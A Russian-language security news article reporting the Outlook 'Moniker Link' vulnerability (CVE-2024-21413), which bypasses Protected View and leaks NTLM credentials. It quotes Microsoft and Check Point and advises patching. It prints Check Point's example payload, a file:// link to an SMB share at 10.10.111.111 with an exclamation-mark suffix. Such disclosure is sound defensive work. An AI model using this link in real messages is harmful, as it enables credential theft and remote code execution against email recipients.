Компания Microsoft сообщает, что удаленные неаутентифицированные злоумышленники могут использовать критическую уязвимость в Outlook, которая позволяет обойти Office Protected View и добиться удаленного выполнения произвольного кода.
Эта уязвимость была обнаружена исследователями компании Check Point и получила идентификатор CVE-2024-21413. Она затрагивает ряд продуктов Office, включая Microsoft Office LTSC 2021 и Microsoft 365 Apps for Enterprise, а также Microsoft Outlook 2016 и Microsoft Office 2019.
Ошибка приводит к удаленному выполнению кода при открытии писем с вредоносными ссылками с помощью уязвимой версии Microsoft Outlook. Дело в том, что ошибка позволяет обойти Protected View (механизм, предназначенный для блокировки вредоносного содержимого, встроенного в файлы Office, путем открытия в режиме только для чтения) и открывать вредоносные файлы Office в режиме редактирования.
Разработчики предупредили, что панель предварительного просмотра тоже может стать вектором атаки, так как эксплуатировать CVE-2024-21413 можно даже через предварительный просмотр вредоносных документов.
«Злоумышленник, успешно эксплуатирующий эту уязвимость, может получить высокие привилегии, включающие функции чтения, записи и удаления, — поясняет Microsoft. — Злоумышленник может создать вредоносную ссылку для обхода Protected View, что приведет к утечке локальной учетной информации NTLM и удаленному выполнению кода (RCE)».
Аналитики Check Point дали уязвимости название Moniker Link, и рассказывают, что она позволяет обойти защиту Outlook от вредоносных ссылок, встроенных в электронные письма посредством file://. Нужно лишь добавить восклицательный знак к URL, который указывает на подконтрольные злоумышленникам серверы.
Восклицательный знак добавляется сразу после расширения документа вместе с произвольным текстом (в своем примере Check Point использовала слово «something»): *<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*
Такая ссылка обходит ограничения Outlook, и Outlook получает доступ к удаленному ресурсу \\\10.10.111.111\test\test.rtf при нажатии на ссылку, не отображая при этом никаких предупреждений или ошибок.
По словам исследователей, уязвимость связана с API MkParseDisplayName, поэтому может влиять и на другое ПО, которое его использует.
«Другие редакции и версии Office, вероятно, также затронуты этой проблемой. На самом деле, мы считаем, что эта ошибка оставалась незамеченной и существовала в экосистеме Windows/COM на протяжении десятилетий, поскольку в основе лежит COM API. Мы настоятельно рекомендуем всем пользователям Outlook как можно скорее установить официальный патч», — пишут в Check Point.
